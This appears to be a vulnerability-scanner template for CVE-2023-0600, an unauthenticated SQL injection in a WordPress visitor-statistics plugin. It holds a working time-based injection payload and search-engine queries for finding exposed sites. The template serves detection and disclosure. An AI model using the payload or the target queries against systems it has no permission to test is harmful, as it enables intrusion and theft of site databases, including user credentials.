Description
The plugin does not escape user input which is concatenated to an SQL query, allowing unauthenticated visitors to conduct SQL Injection attacks.
The plugin does not escape user input which is concatenated to an SQL query, allowing unauthenticated visitors to conduct SQL Injection attacks.
id: CVE-2023-0600
info:
name: WP Visitor Statistics (Real Time Traffic) < 6.9 - SQL Injection
author: r3Y3r53,j4vaovo
severity: critical
description: |
The plugin does not escape user input which is concatenated to an SQL query, allowing unauthenticated visitors to conduct SQL Injection attacks.
impact: |
Unauthenticated attackers can execute time-based SQL injection through the visitorId parameter to extract the complete WordPress database including user credentials and site statistics.
remediation: Fixed in version 6.9
reference:
- https://wpscan.com/vulnerability/8f46df4d-cb80-4d66-846f-85faf2ea0ec4
- https://nvd.nist.gov/vuln/detail/CVE-2023-0600
- https://github.com/truocphan/VulnBox
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-0600
cwe-id: CWE-89
epss-score: 0.04234
epss-percentile: 0.90513
cpe: cpe:2.3:a:plugins-market:wp_visitor_statistics:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: plugins-market
product: wp_visitor_statistics
framework: wordpress
shodan-query: http.html:"wp-stats-manager"
fofa-query: body="wp-stats-manager"
google-query: inurl:"/wp-content/plugins/wp-stats-manager"
public-www: /wp-content/plugins/wp-stats-manager/
tags: time-based-sqli,cve,cve2023,wp,wp-plugin,wordpress,wpscan,unauth,wp-stats-manager,sqli,plugins-market,vkev,vuln
variables:
str: '{{rand_int(100000, 999999)}}'
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Real Time Traffic'
- raw:
- |
@timeout: 30s
GET /?wmcAction=wmcTrack&siteId=34&url=test&uid=01&pid=02&visitorId={{str}}%27,sleep(6),0,0,0,0,0);--+- HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(body, "sleep(6)")'
condition: and
# digest: 4a0a004730450220184e8447d3939659d30712505930921cf709c700acf3433f0b903f7ec4c016fd0221008d7f1184aa2c06934f17120dd4557269d29a4770847e5b9e0862b9c92741c230:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.